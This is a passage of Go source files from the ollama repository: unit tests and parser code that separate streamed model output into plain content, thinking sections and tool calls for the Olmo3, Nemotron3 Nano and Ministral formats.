// and that assistant prefill with content starts the parser in content mode.
func TestOlmo3ThinkParser_Init(t *testing.T) {
	parser := &Olmo3ThinkParser{}
	tools := []api.Tool{
		{Function: api.ToolFunction{Name: "test_tool"}},
	}
	lastMessage := &api.Message{Role: "assistant", Content: "previous"}

	returnedTools := parser.Init(tools, lastMessage, nil)

	if len(returnedTools) != len(tools) {
		t.Errorf("expected %d tools returned, got %d", len(tools), len(returnedTools))
	}

	// Should be in content collection mode due to prefill
	if parser.state != olmo3CollectingContent {
		t.Errorf("expected state olmo3CollectingContent, got %v", parser.state)
	}
}

func TestOlmo3ThinkParser_InitWithoutPrefill(t *testing.T) {
	parser := &Olmo3ThinkParser{}
	parser.Init(nil, nil, nil)

	// Should be in thinking collection mode (model always thinks first)
	if parser.state != olmo3CollectingThink {
		t.Errorf("expected state olmo3CollectingThink, got %v", parser.state)
	}
}
go
MIT
626af2d80973270c4d59b8df7153ac47ad67ed7b
2026-01-07T08:35:43.337630Z
false
ollama/ollama
https://github.com/ollama/ollama/blob/626af2d80973270c4d59b8df7153ac47ad67ed7b/model/parsers/nemotron3nano_test.go
model/parsers/nemotron3nano_test.go
package parsers

import (
	"testing"

	"github.com/google/go-cmp/cmp"

	"github.com/ollama/ollama/api"
)

// TestNemotron3NanoParser feeds each input as one chunk (plus a drain call)
// and checks the content/thinking/tool-call split. Helpers testArgs and
// argsComparer are shared test utilities from this package.
func TestNemotron3NanoParser(t *testing.T) {
	tests := []struct {
		name             string
		input            string
		thinkValue       *api.ThinkValue // nil means thinking not requested
		expectedContent  string
		expectedThinking string
		expectedCalls    []api.ToolCall
	}{
		{
			name:            "simple content - no thinking",
			input:           "Hello, how can I help you?",
			thinkValue:      nil,
			expectedContent: "Hello, how can I help you?",
		},
		{
			name:            "simple content - thinking disabled",
			input:           "Hello, how can I help you?",
			thinkValue:      &api.ThinkValue{Value: false},
			expectedContent: "Hello, how can I help you?",
		},
		{
			name:             "thinking then content",
			input:            "Let me think about this...</think>\nHere is my answer.",
			thinkValue:       &api.ThinkValue{Value: true},
			expectedThinking: "Let me think about this...",
			expectedContent:  "Here is my answer.",
		},
		{
			name:             "thinking with newlines",
			input:            "Step 1: Analyze\nStep 2: Process\nStep 3: Conclude</think>\nThe answer is 42.",
			thinkValue:       &api.ThinkValue{Value: true},
			expectedThinking: "Step 1: Analyze\nStep 2: Process\nStep 3: Conclude",
			expectedContent:  "The answer is 42.",
		},
		{
			name:       "simple tool call",
			input:      "<tool_call>\n<function=get_weather>\n<parameter=city>\nParis\n</parameter>\n</function>\n</tool_call>",
			thinkValue: nil,
			expectedCalls: []api.ToolCall{
				{
					Function: api.ToolCallFunction{
						Name:      "get_weather",
						Arguments: testArgs(map[string]any{"city": "Paris"}),
					},
				},
			},
		},
		{
			name:            "content then tool call",
			input:           "Let me check the weather.\n<tool_call>\n<function=get_weather>\n<parameter=city>\nNYC\n</parameter>\n</function>\n</tool_call>",
			thinkValue:      nil,
			expectedContent: "Let me check the weather.",
			expectedCalls: []api.ToolCall{
				{
					Function: api.ToolCallFunction{
						Name:      "get_weather",
						Arguments: testArgs(map[string]any{"city": "NYC"}),
					},
				},
			},
		},
		{
			name:       "tool call with multiple parameters",
			input:      "<tool_call>\n<function=book_flight>\n<parameter=from>\nSFO\n</parameter>\n<parameter=to>\nNYC\n</parameter>\n</function>\n</tool_call>",
			thinkValue: nil,
			expectedCalls: []api.ToolCall{
				{
					Function: api.ToolCallFunction{
						Name: "book_flight",
						Arguments: testArgs(map[string]any{
							"from": "SFO",
							"to":   "NYC",
						}),
					},
				},
			},
		},
		{
			name: "multiple tool calls",
			input: "<tool_call>\n<function=get_weather>\n<parameter=city>\nSan Francisco\n</parameter>\n</function>\n</tool_call>\n" +
				"<tool_call>\n<function=get_weather>\n<parameter=city>\nNew York\n</parameter>\n</function>\n</tool_call>",
			thinkValue: nil,
			expectedCalls: []api.ToolCall{
				{
					Function: api.ToolCallFunction{
						Name:      "get_weather",
						Arguments: testArgs(map[string]any{"city": "San Francisco"}),
					},
				},
				{
					Function: api.ToolCallFunction{
						Name:      "get_weather",
						Arguments: testArgs(map[string]any{"city": "New York"}),
					},
				},
			},
		},
		{
			name:             "thinking then tool call",
			input:            "I should check the weather...</think>\n<tool_call>\n<function=get_weather>\n<parameter=city>\nParis\n</parameter>\n</function>\n</tool_call>",
			thinkValue:       &api.ThinkValue{Value: true},
			expectedThinking: "I should check the weather...",
			expectedCalls: []api.ToolCall{
				{
					Function: api.ToolCallFunction{
						Name:      "get_weather",
						Arguments: testArgs(map[string]any{"city": "Paris"}),
					},
				},
			},
		},
		{
			name:             "thinking content then tool call",
			input:            "Let me think...</think>\nI'll check for you.\n<tool_call>\n<function=search>\n<parameter=query>\ntest\n</parameter>\n</function>\n</tool_call>",
			thinkValue:       &api.ThinkValue{Value: true},
			expectedThinking: "Let me think...",
			expectedContent:  "I'll check for you.",
			expectedCalls: []api.ToolCall{
				{
					Function: api.ToolCallFunction{
						Name:      "search",
						Arguments: testArgs(map[string]any{"query": "test"}),
					},
				},
			},
		},
		{
			name:       "tool call with multiline parameter value",
			input:      "<tool_call>\n<function=create_note>\n<parameter=content>\nLine 1\nLine 2\nLine 3\n</parameter>\n</function>\n</tool_call>",
			thinkValue: nil,
			expectedCalls: []api.ToolCall{
				{
					Function: api.ToolCallFunction{
						Name:      "create_note",
						Arguments: testArgs(map[string]any{"content": "Line 1\nLine 2\nLine 3"}),
					},
				},
			},
		},
		{
			name:             "empty thinking block - immediate close",
			input:            "</think>\nHere is my answer.",
			thinkValue:       &api.ThinkValue{Value: true},
			expectedThinking: "",
			expectedContent:  "Here is my answer.",
		},
		{
			// With thinking disabled, a stray </think> is treated as content.
			name:            "thinking disabled but model outputs think close anyway",
			input:           "</think>\nSome content after spurious tag.",
			thinkValue:      &api.ThinkValue{Value: false},
			expectedContent: "</think>\nSome content after spurious tag.",
		},
		{
			name:          "tool call with no function name - returns empty tool call",
			input:         "<tool_call>\n<function=>\n</function>\n</tool_call>",
			thinkValue:    nil,
			expectedCalls: []api.ToolCall{{Function: api.ToolCallFunction{Name: "", Arguments: api.NewToolCallFunctionArguments()}}},
		},
		{
			name:            "content with newlines preserved",
			input:           "Line 1\n\nLine 2\n\n\nLine 3",
			thinkValue:      nil,
			expectedContent: "Line 1\n\nLine 2\n\n\nLine 3",
		},
		{
			name:             "thinking with only whitespace after close tag",
			input:            "My thoughts...</think> \n\t\n Content here.",
			thinkValue:       &api.ThinkValue{Value: true},
			expectedThinking: "My thoughts...",
			expectedContent:  "Content here.",
		},
		{
			name:            "unicode content",
			input:           "Hello 世界! 🌍 Ñoño",
			thinkValue:      nil,
			expectedContent: "Hello 世界! 🌍 Ñoño",
		},
		{
			// Parameter values stay strings; no numeric coercion.
			name:       "tool call with numeric parameter",
			input:      "<tool_call>\n<function=set_temp>\n<parameter=value>\n42\n</parameter>\n</function>\n</tool_call>",
			thinkValue: nil,
			expectedCalls: []api.ToolCall{
				{
					Function: api.ToolCallFunction{
						Name:      "set_temp",
						Arguments: testArgs(map[string]any{"value": "42"}),
					},
				},
			},
		},
	}

	for _, tt := range tests {
		t.Run(tt.name, func(t *testing.T) {
			p := &Nemotron3NanoParser{}
			p.Init(nil, nil, tt.thinkValue)

			content, thinking, calls, err := p.Add(tt.input, false)
			if err != nil {
				t.Fatalf("unexpected error: %v", err)
			}

			// Drain remaining content
			finalContent, finalThinking, finalCalls, err := p.Add("", true)
			if err != nil {
				t.Fatalf("unexpected error on done: %v", err)
			}
			content += finalContent
			thinking += finalThinking
			calls = append(calls, finalCalls...)

			if diff := cmp.Diff(content, tt.expectedContent); diff != "" {
				t.Errorf("content mismatch (-got +want):\n%s", diff)
			}
			if diff := cmp.Diff(thinking, tt.expectedThinking); diff != "" {
				t.Errorf("thinking mismatch (-got +want):\n%s", diff)
			}
			if diff := cmp.Diff(calls, tt.expectedCalls, argsComparer); diff != "" {
				t.Errorf("calls mismatch (-got +want):\n%s", diff)
			}
		})
	}
}

// TestNemotron3NanoParser_Streaming replays output in small chunks —
// including tags split mid-token and character by character — and checks the
// accumulated results match the single-chunk expectations.
func TestNemotron3NanoParser_Streaming(t *testing.T) {
	tests := []struct {
		name             string
		chunks           []string
		thinkValue       *api.ThinkValue
		expectedContent  string
		expectedThinking string
		expectedCalls    []api.ToolCall
	}{
		{
			name:            "streaming content character by character",
			chunks:          []string{"H", "e", "l", "l", "o", ",", " ", "w", "o", "r", "l", "d", "!"},
			thinkValue:      nil,
			expectedContent: "Hello, world!",
		},
		{
			name:            "streaming content small tokens",
			chunks:          []string{"Hel", "lo", ", ", "how ", "can", " I", " help", " you", " today", "?"},
			thinkValue:      nil,
			expectedContent: "Hello, how can I help you today?",
		},
		{
			name:             "streaming thinking then content - granular",
			chunks:           []string{"Let", " me", " th", "ink", " about", " this", "...", "<", "/", "think", ">", "\n", "Here", " is", " my", " answer", "."},
			thinkValue:       &api.ThinkValue{Value: true},
			expectedThinking: "Let me think about this...",
			expectedContent:  "Here is my answer.",
		},
		{
			name:             "streaming thinking with newlines - granular",
			chunks:           []string{"Step", " 1", ":", " Ana", "lyze\n", "Step", " 2", ":", " Pro", "cess", "</", "thi", "nk>", "\n", "The", " ans", "wer."},
			thinkValue:       &api.ThinkValue{Value: true},
			expectedThinking: "Step 1: Analyze\nStep 2: Process",
			expectedContent:  "The answer.",
		},
		{
			name:       "streaming tool call - highly granular",
			chunks:     []string{"<", "tool", "_", "call", ">", "\n", "<", "func", "tion", "=", "get", "_", "weather", ">", "\n", "<", "param", "eter", "=", "city", ">", "\n", "Par", "is", "\n", "</", "param", "eter", ">", "\n", "</", "func", "tion", ">", "\n", "</", "tool", "_", "call", ">"},
			thinkValue: nil,
			expectedCalls: []api.ToolCall{
				{
					Function: api.ToolCallFunction{
						Name:      "get_weather",
						Arguments: testArgs(map[string]any{"city": "Paris"}),
					},
				},
			},
		},
		{
			name:            "streaming content then tool call - granular",
			chunks:          []string{"Let", " me", " check", " the", " weather", ".", "\n<", "tool_call", ">", "\n", "<function=", "get_weather", ">", "\n", "<parameter=", "city", ">", "\n", "NYC", "\n", "</parameter>", "\n", "</function>", "\n", "</tool_call>"},
			thinkValue:      nil,
			expectedContent: "Let me check the weather.",
			expectedCalls: []api.ToolCall{
				{
					Function: api.ToolCallFunction{
						Name:      "get_weather",
						Arguments: testArgs(map[string]any{"city": "NYC"}),
					},
				},
			},
		},
		{
			name:   "tool call tag split character by character",
			chunks: []string{"<", "t", "o", "o", "l", "_", "c", "a", "l", "l", ">", "\n", "<", "f", "u", "n", "c", "t", "i", "o", "n", "=", "t", "e", "s", "t", ">", "\n", "<", "/", "f", "u", "n", "c", "t", "i", "o", "n", ">", "\n", "<", "/", "t", "o", "o", "l", "_", "c", "a", "l", "l", ">"},
			expectedCalls: []api.ToolCall{
				{
					Function: api.ToolCallFunction{
						Name:      "test",
						Arguments: api.NewToolCallFunctionArguments(),
					},
				},
			},
		},
		{
			name:             "thinking close tag split character by character",
			chunks:           []string{"I", "'", "m", " ", "t", "h", "i", "n", "k", "i", "n", "g", ".", ".", ".", "<", "/", "t", "h", "i", "n", "k", ">", "\n", "D", "o", "n", "e", "!"},
			thinkValue:       &api.ThinkValue{Value: true},
			expectedThinking: "I'm thinking...",
			expectedContent:  "Done!",
		},
		{
			name:             "multiple whitespace after think tag - separate chunks",
			chunks:           []string{"Thinking...", "</think>", "\n", "\n", " ", "Content here."},
			thinkValue:       &api.ThinkValue{Value: true},
			expectedThinking: "Thinking...",
			expectedContent:  "Content here.",
		},
		{
			name:       "tool call with multiple parameters - streaming",
			chunks:     []string{"<tool_", "call>\n", "<function", "=book_", "flight>", "\n<para", "meter=", "from>\n", "SFO\n", "</param", "eter>", "\n<param", "eter=to", ">\nNYC", "\n</para", "meter>", "\n</func", "tion>\n", "</tool_", "call>"},
			thinkValue: nil,
			expectedCalls: []api.ToolCall{
				{
					Function: api.ToolCallFunction{
						Name: "book_flight",
						Arguments: testArgs(map[string]any{
							"from": "SFO",
							"to":   "NYC",
						}),
					},
				},
			},
		},
		{
			name:             "thinking then content then tool call - streaming",
			chunks:           []string{"Ana", "lyzing", " your", " request", "...", "</", "think", ">\n", "I'll", " check", " that", " for", " you", ".", "\n", "<tool", "_call", ">\n", "<function", "=search", ">\n", "<parameter", "=query", ">\n", "test", " query", "\n</", "parameter", ">\n", "</function", ">\n", "</tool", "_call", ">"},
			thinkValue:       &api.ThinkValue{Value: true},
			expectedThinking: "Analyzing your request...",
			expectedContent:  "I'll check that for you.",
			expectedCalls: []api.ToolCall{
				{
					Function: api.ToolCallFunction{
						Name:      "search",
						Arguments: testArgs(map[string]any{"query": "test query"}),
					},
				},
			},
		},
		{
			name: "multiple tool calls - streaming",
			chunks: []string{
				"<tool_call>", "\n", "<function=", "get_weather>", "\n", "<parameter=", "city>\n", "San Fran", "cisco\n", "</parameter>", "\n", "</function>", "\n", "</tool_call>", "\n", "<tool_", "call>\n", "<function", "=get_weather", ">\n", "<param", "eter=city", ">\nNew", " York\n", "</parameter>\n", "</function>\n", "</tool_call>",
			},
			thinkValue: nil,
			expectedCalls: []api.ToolCall{
				{
					Function: api.ToolCallFunction{
						Name:      "get_weather",
						Arguments: testArgs(map[string]any{"city": "San Francisco"}),
					},
				},
				{
					Function: api.ToolCallFunction{
						Name:      "get_weather",
						Arguments: testArgs(map[string]any{"city": "New York"}),
					},
				},
			},
		},
		{
			name:       "tool call with multiline parameter - streaming",
			chunks:     []string{"<tool_call>\n", "<function=", "create_note>\n", "<parameter=", "content>\n", "Line 1", "\nLine", " 2\n", "Line 3", "\n</parameter>\n", "</function>\n", "</tool_call>"},
			thinkValue: nil,
			expectedCalls: []api.ToolCall{
				{
					Function: api.ToolCallFunction{
						Name:      "create_note",
						Arguments: testArgs(map[string]any{"content": "Line 1\nLine 2\nLine 3"}),
					},
				},
			},
		},
		{
			name:             "empty thinking block",
			chunks:           []string{"</think>", "\n", "Just content."},
			thinkValue:       &api.ThinkValue{Value: true},
			expectedThinking: "",
			expectedContent:  "Just content.",
		},
		{
			name:            "empty input chunks interspersed",
			chunks:          []string{"Hello", "", " ", "", "world", "", "!"},
			thinkValue:      nil,
			expectedContent: "Hello world!",
		},
		{
			name:             "tool call immediately after think close - no content",
			chunks:           []string{"Analyzing...", "</think>", "\n", "<tool_call>", "\n<function=test>\n</function>\n", "</tool_call>"},
			thinkValue:       &api.ThinkValue{Value: true},
			expectedThinking: "Analyzing...",
			expectedCalls: []api.ToolCall{
				{
					Function: api.ToolCallFunction{
						Name:      "test",
						Arguments: api.NewToolCallFunctionArguments(),
					},
				},
			},
		},
		{
			name:       "tool call with empty parameter value",
			chunks:     []string{"<tool_call>\n<function=test>\n<parameter=name>\n", "\n</parameter>\n</function>\n</tool_call>"},
			thinkValue: nil,
			expectedCalls: []api.ToolCall{
				{
					Function: api.ToolCallFunction{
						Name:      "test",
						Arguments: testArgs(map[string]any{"name": ""}),
					},
				},
			},
		},
		{
			// A dangling "<tool" at stream end is withheld, not emitted.
			name:            "partial tool call tag at end - buffered",
			chunks:          []string{"Here's some content", "<tool"},
			thinkValue:      nil,
			expectedContent: "Here's some content",
		},
	}

	for _, tt := range tests {
		t.Run(tt.name, func(t *testing.T) {
			p := &Nemotron3NanoParser{}
			p.Init(nil, nil, tt.thinkValue)

			var allContent string
			var allThinking string
			var allCalls []api.ToolCall

			for _, chunk := range tt.chunks {
				content, thinking, calls, err := p.Add(chunk, false)
				if err != nil {
					t.Fatalf("unexpected error: %v", err)
				}
				allContent += content
				allThinking += thinking
				allCalls = append(allCalls, calls...)
			}

			// Drain
			content, thinking, calls, err := p.Add("", true)
			if err != nil {
				t.Fatalf("unexpected error on done: %v", err)
			}
			allContent += content
			allThinking += thinking
			allCalls = append(allCalls, calls...)

			if diff := cmp.Diff(allContent, tt.expectedContent); diff != "" {
				t.Errorf("content mismatch (-got +want):\n%s", diff)
			}
			if diff := cmp.Diff(allThinking, tt.expectedThinking); diff != "" {
				t.Errorf("thinking mismatch (-got +want):\n%s", diff)
			}
			if diff := cmp.Diff(allCalls, tt.expectedCalls, argsComparer); diff != "" {
				t.Errorf("calls mismatch (-got +want):\n%s", diff)
			}
		})
	}
}

func TestNemotron3NanoParser_HasToolSupport(t *testing.T) {
	p := &Nemotron3NanoParser{}
	if !p.HasToolSupport() {
		t.Error("expected HasToolSupport to return true")
	}
}

func TestNemotron3NanoParser_HasThinkingSupport(t *testing.T) {
	p := &Nemotron3NanoParser{}
	if !p.HasThinkingSupport() {
		t.Error("expected HasThinkingSupport to return true")
	}
}

// TestNemotron3NanoParser_Init verifies the initial state chosen for each
// combination of think value and assistant prefill.
func TestNemotron3NanoParser_Init(t *testing.T) {
	t.Run("starts in thinking state when enabled", func(t *testing.T) {
		p := &Nemotron3NanoParser{}
		p.Init(nil, nil, &api.ThinkValue{Value: true})
		if p.state != Nemotron3NanoCollectingThinking {
			t.Errorf("expected state Nemotron3NanoCollectingThinking, got %v", p.state)
		}
	})

	t.Run("starts in content state when thinking disabled", func(t *testing.T) {
		p := &Nemotron3NanoParser{}
		p.Init(nil, nil, &api.ThinkValue{Value: false})
		if p.state != Nemotron3NanoCollectingContent {
			t.Errorf("expected state Nemotron3NanoCollectingContent, got %v", p.state)
		}
	})

	t.Run("starts in content state when nil thinkValue", func(t *testing.T) {
		p := &Nemotron3NanoParser{}
		p.Init(nil, nil, nil)
		if p.state != Nemotron3NanoCollectingContent {
			t.Errorf("expected state Nemotron3NanoCollectingContent, got %v", p.state)
		}
	})

	t.Run("starts in content state with assistant prefill", func(t *testing.T) {
		p := &Nemotron3NanoParser{}
		prefill := &api.Message{Role: "assistant", Content: "Starting..."}
		p.Init(nil, prefill, &api.ThinkValue{Value: true})
		if p.state != Nemotron3NanoCollectingContent {
			t.Errorf("expected state Nemotron3NanoCollectingContent, got %v", p.state)
		}
	})
}

// TestNemotron3NanoParser_WithTools checks that Init returns the tool
// definitions unchanged and that a declared tool parses correctly.
func TestNemotron3NanoParser_WithTools(t *testing.T) {
	tools := []api.Tool{
		{
			Type: "function",
			Function: api.ToolFunction{
				Name: "get_weather",
				Parameters: api.ToolFunctionParameters{
					Type: "object",
					Properties: testPropsMap(map[string]api.ToolProperty{
						"city": {Type: api.PropertyType{"string"}},
					}),
				},
			},
		},
	}

	p := &Nemotron3NanoParser{}
	returnedTools := p.Init(tools, nil, nil)

	if diff := cmp.Diff(returnedTools, tools, toolsComparer); diff != "" {
		t.Errorf("tools mismatch (-got +want):\n%s", diff)
	}

	// Parse a tool call
	input := "<tool_call>\n<function=get_weather>\n<parameter=city>\nParis\n</parameter>\n</function>\n</tool_call>"
	_, _, calls, err := p.Add(input, true)
	if err != nil {
		t.Fatalf("unexpected error: %v", err)
	}

	expectedCalls := []api.ToolCall{
		{
			Function: api.ToolCallFunction{
				Name:      "get_weather",
				Arguments: testArgs(map[string]any{"city": "Paris"}),
			},
		},
	}
	if diff := cmp.Diff(calls, expectedCalls, argsComparer); diff != "" {
		t.Errorf("calls mismatch (-got +want):\n%s", diff)
	}
}
go
MIT
626af2d80973270c4d59b8df7153ac47ad67ed7b
2026-01-07T08:35:43.337630Z
false
ollama/ollama
https://github.com/ollama/ollama/blob/626af2d80973270c4d59b8df7153ac47ad67ed7b/model/parsers/ministral.go
model/parsers/ministral.go
package parsers

import (
	"encoding/json"
	"errors"
	"fmt"
	"io"
	"strings"

	"github.com/ollama/ollama/api"
)

// ministralParserState enumerates the phases of Ministral stream parsing.
type ministralParserState int

const (
	ministralCollectingContent ministralParserState = iota
	ministralCollectingThinkingContent
	ministralCollectingToolName
	ministralCollectingToolArgs
)

// MinistralParser incrementally parses Ministral model output, separating
// plain content, [THINK]...[/THINK] thinking sections, and
// [TOOL_CALLS]name[ARGS]{...} tool invocations.
type MinistralParser struct {
	state              ministralParserState
	buffer             strings.Builder // unconsumed input carried across Add calls
	tools              []api.Tool
	hasThinkingSupport bool
	currentTool        *api.Tool // tool named by the [TOOL_CALLS] section being parsed
}

// HasToolSupport reports that this parser understands tool calls.
func (p *MinistralParser) HasToolSupport() bool {
	return true
}

// HasThinkingSupport reports whether this parser variant emits thinking.
func (p *MinistralParser) HasThinkingSupport() bool {
	return p.hasThinkingSupport
}

// setInitialState picks the starting state: thinking-first unless thinking is
// unsupported, or we are continuing an assistant message that already has
// content (prefill).
func (p *MinistralParser) setInitialState(lastMessage *api.Message) {
	prefill := lastMessage != nil && lastMessage.Role == "assistant"
	if !p.HasThinkingSupport() {
		p.state = ministralCollectingContent
		return
	}
	if prefill && lastMessage.Content != "" {
		p.state = ministralCollectingContent
		return
	}
	p.state = ministralCollectingThinkingContent
}

// Init stores the tool definitions and resets the parser state. Ministral
// does not rename tools, so the slice is returned unchanged.
func (p *MinistralParser) Init(tools []api.Tool, lastMessage *api.Message, thinkValue *api.ThinkValue) []api.Tool {
	p.tools = tools
	p.setInitialState(lastMessage)
	return tools
}

// toolByName returns a pointer to the tool whose function name is n.
func toolByName(tools []api.Tool, n string) (*api.Tool, error) {
	for i := range tools {
		if tools[i].Function.Name == n {
			return &tools[i], nil
		}
	}
	return nil, fmt.Errorf("tool '%s' not found", n)
}

// Add consumes the next streamed chunk and returns any content, thinking,
// and tool calls that became unambiguous. It loops so that several sections
// arriving in one chunk (e.g. content, then [TOOL_CALLS], then the complete
// arguments object) are all handled in a single call.
//
// Fixes over the previous version: the state transition to tool-name parsing
// happens even when content precedes [TOOL_CALLS] (it used to be skipped,
// dropping the tool call); the remainder after [TOOL_CALLS] is no longer
// leaked back as content; content before [THINK] and the tag itself no
// longer leak into the thinking text; and the arguments object is located
// with a JSON decoder instead of the first '}', which handles nested objects
// and '}' inside strings.
//
// NOTE(review): markers split across chunk boundaries (e.g. "[TOOL_" then
// "CALLS]") are still not reassembled — confirm whether upstream chunking
// can split markers before relying on that.
func (p *MinistralParser) Add(s string, done bool) (content string, thinking string, calls []api.ToolCall, err error) {
	p.buffer.WriteString(s)

	for {
		switch p.state {
		case ministralCollectingContent:
			buf := p.buffer.String()
			if strings.Contains(buf, "[TOOL_CALLS]") {
				// Emit everything before the marker as content, then parse
				// the tool name from the remainder.
				before, _ := splitAtTag(&p.buffer, "[TOOL_CALLS]", false)
				content += before
				p.state = ministralCollectingToolName
				continue
			}
			if strings.Contains(buf, "[THINK]") {
				// Split the marker off so neither it nor the preceding
				// content ends up in the thinking text.
				before, _ := splitAtTag(&p.buffer, "[THINK]", true)
				content += before
				p.state = ministralCollectingThinkingContent
				continue
			}
			// Plain content: emit everything buffered.
			p.buffer.Reset()
			return content + buf, thinking, calls, nil

		case ministralCollectingThinkingContent:
			if !strings.Contains(p.buffer.String(), "[/THINK]") {
				// Still inside the thinking section; flush what we have.
				chunk := p.buffer.String()
				p.buffer.Reset()
				return content, thinking + chunk, calls, nil
			}
			thought, _ := splitAtTag(&p.buffer, "[/THINK]", true)
			thinking += thought
			p.state = ministralCollectingContent
			continue

		case ministralCollectingToolName:
			if !strings.Contains(p.buffer.String(), "[ARGS]") {
				// Tool name incomplete; wait for more input.
				return content, thinking, calls, nil
			}
			name, _ := splitAtTag(&p.buffer, "[ARGS]", false)
			tool, lookupErr := toolByName(p.tools, name)
			if lookupErr != nil {
				return content, thinking, calls, lookupErr
			}
			p.currentTool = tool
			p.state = ministralCollectingToolArgs
			continue

		case ministralCollectingToolArgs:
			// Decode one complete JSON object from the buffer. A decoder
			// (unlike splitting at the first '}') copes with nested objects
			// and braces inside string values.
			raw := p.buffer.String()
			dec := json.NewDecoder(strings.NewReader(raw))
			var args api.ToolCallFunctionArguments
			if decErr := dec.Decode(&args); decErr != nil {
				if errors.Is(decErr, io.EOF) || errors.Is(decErr, io.ErrUnexpectedEOF) {
					// Arguments object not complete yet; wait for more input.
					return content, thinking, calls, nil
				}
				return content, thinking, calls, fmt.Errorf("parsing arguments for tool %q: %w", p.currentTool.Function.Name, decErr)
			}
			calls = append(calls, api.ToolCall{
				Function: api.ToolCallFunction{
					Name:      p.currentTool.Function.Name,
					Arguments: args,
				},
			})
			// Keep whatever followed the arguments object and resume
			// collecting content.
			rest := raw[dec.InputOffset():]
			p.buffer.Reset()
			p.buffer.WriteString(rest)
			p.state = ministralCollectingContent
			continue

		default:
			// Unreachable with the states above; avoid spinning if the state
			// is ever corrupted.
			p.buffer.Reset()
			return content, thinking, calls, nil
		}
	}
}
go
MIT
626af2d80973270c4d59b8df7153ac47ad67ed7b
2026-01-07T08:35:43.337630Z
false
ollama/ollama
https://github.com/ollama/ollama/blob/626af2d80973270c4d59b8df7153ac47ad67ed7b/model/parsers/olmo3_think.go
model/parsers/olmo3_think.go
package parsers import ( "context" "log/slog" "strings" "unicode" "github.com/ollama/ollama/api" "github.com/ollama/ollama/logutil" ) type olmo3ThinkParserState int const ( olmo3CollectingThink olmo3ThinkParserState = iota olmo3CollectingContent ) const ( olmo3ThinkCloseTag = "</think>" ) type Olmo3ThinkParser struct { state olmo3ThinkParserState buffer strings.Builder } func (p *Olmo3ThinkParser) HasToolSupport() bool { return false } func (p *Olmo3ThinkParser) HasThinkingSupport() bool { return true } func (p *Olmo3ThinkParser) setInitialState(lastMessage *api.Message) { prefill := lastMessage != nil && lastMessage.Role == "assistant" // If prefilling with content, skip to content collection if prefill && lastMessage.Content != "" { p.state = olmo3CollectingContent return } // Model always thinks first (the <think> tag is injected in the prompt) p.state = olmo3CollectingThink } func (p *Olmo3ThinkParser) Init(tools []api.Tool, lastMessage *api.Message, thinkValue *api.ThinkValue) []api.Tool { p.setInitialState(lastMessage) return tools } // Event types for internal parser communication type olmo3Event interface { isOlmo3Event() } type olmo3EventThinkContent struct { content string } type olmo3EventContent struct { content string } func (olmo3EventThinkContent) isOlmo3Event() {} func (olmo3EventContent) isOlmo3Event() {} func (p *Olmo3ThinkParser) Add(s string, done bool) (content string, thinking string, calls []api.ToolCall, err error) { p.buffer.WriteString(s) events := p.parseEvents() var contentSb strings.Builder var thinkingSb strings.Builder for _, event := range events { switch event := event.(type) { case olmo3EventThinkContent: thinkingSb.WriteString(event.content) case olmo3EventContent: contentSb.WriteString(event.content) } } return contentSb.String(), thinkingSb.String(), nil, nil } func (p *Olmo3ThinkParser) parseEvents() []olmo3Event { var all []olmo3Event keepLooping := true for keepLooping { var events []olmo3Event events, keepLooping = p.eat() 
if len(events) > 0 { all = append(all, events...) } } if len(all) > 0 { slog.Log(context.TODO(), logutil.LevelTrace, "olmo3 events parsed", "events", all, "state", p.state, "buffer", p.buffer.String()) } return all } func (p *Olmo3ThinkParser) eat() ([]olmo3Event, bool) { var events []olmo3Event bufStr := p.buffer.String() if bufStr == "" { return events, false } switch p.state { case olmo3CollectingThink: if strings.Contains(bufStr, olmo3ThinkCloseTag) { // Found complete </think> tag split := strings.SplitN(bufStr, olmo3ThinkCloseTag, 2) thinking := strings.TrimRightFunc(split[0], unicode.IsSpace) remaining := strings.TrimLeftFunc(split[1], unicode.IsSpace) p.buffer.Reset() p.buffer.WriteString(remaining) p.state = olmo3CollectingContent if len(thinking) > 0 { events = append(events, olmo3EventThinkContent{content: thinking}) } return events, true } else if overlapLen := overlap(bufStr, olmo3ThinkCloseTag); overlapLen > 0 { // Partial </think> tag - withhold ambiguous content beforePartialTag := bufStr[:len(bufStr)-overlapLen] trailingLen := trailingWhitespaceLen(beforePartialTag) ambiguousStart := len(beforePartialTag) - trailingLen unambiguous := bufStr[:ambiguousStart] ambiguous := bufStr[ambiguousStart:] p.buffer.Reset() p.buffer.WriteString(ambiguous) if len(unambiguous) > 0 { events = append(events, olmo3EventThinkContent{content: unambiguous}) } return events, false } else { // Regular thinking content - withhold trailing whitespace in case </think> follows whitespaceLen := trailingWhitespaceLen(bufStr) ambiguousStart := len(bufStr) - whitespaceLen unambiguous := bufStr[:ambiguousStart] ambiguous := bufStr[ambiguousStart:] p.buffer.Reset() p.buffer.WriteString(ambiguous) if len(unambiguous) > 0 { events = append(events, olmo3EventThinkContent{content: unambiguous}) } return events, false } case olmo3CollectingContent: // Emit all content directly p.buffer.Reset() if len(bufStr) > 0 { events = append(events, olmo3EventContent{content: bufStr}) } return 
events, false } return events, false }
go
MIT
626af2d80973270c4d59b8df7153ac47ad67ed7b
2026-01-07T08:35:43.337630Z
false
ollama/ollama
https://github.com/ollama/ollama/blob/626af2d80973270c4d59b8df7153ac47ad67ed7b/model/parsers/olmo3.go
model/parsers/olmo3.go
package parsers import ( "context" "fmt" "log/slog" "regexp" "strconv" "strings" "github.com/ollama/ollama/api" "github.com/ollama/ollama/logutil" ) type olmo3ParserState int const ( olmo3StateContent olmo3ParserState = iota olmo3StateToolCalls olmo3StateToolCallsDone ) const ( olmo3FuncCallsOpenTag = "<function_calls>" olmo3FuncCallsCloseTag = "</function_calls>" ) type Olmo3Parser struct { state olmo3ParserState buffer strings.Builder } func (p *Olmo3Parser) HasToolSupport() bool { return true } func (p *Olmo3Parser) HasThinkingSupport() bool { return false } func (p *Olmo3Parser) Init(tools []api.Tool, lastMessage *api.Message, thinkValue *api.ThinkValue) []api.Tool { p.state = olmo3StateContent return tools } type olmo3ParserEvent interface { isOlmo3ParserEvent() } type olmo3ParserEventContent struct { content string } type olmo3ParserEventToolCalls struct { calls []api.ToolCall } func (olmo3ParserEventContent) isOlmo3ParserEvent() {} func (olmo3ParserEventToolCalls) isOlmo3ParserEvent() {} func (p *Olmo3Parser) Add(s string, done bool) (content string, thinking string, calls []api.ToolCall, err error) { p.buffer.WriteString(s) if done { // Drain any remaining content bufStr := p.buffer.String() p.buffer.Reset() if p.state == olmo3StateContent && len(bufStr) > 0 { return bufStr, "", nil, nil } return "", "", nil, nil } events := p.parseEvents() var contentSb strings.Builder var allCalls []api.ToolCall for _, event := range events { 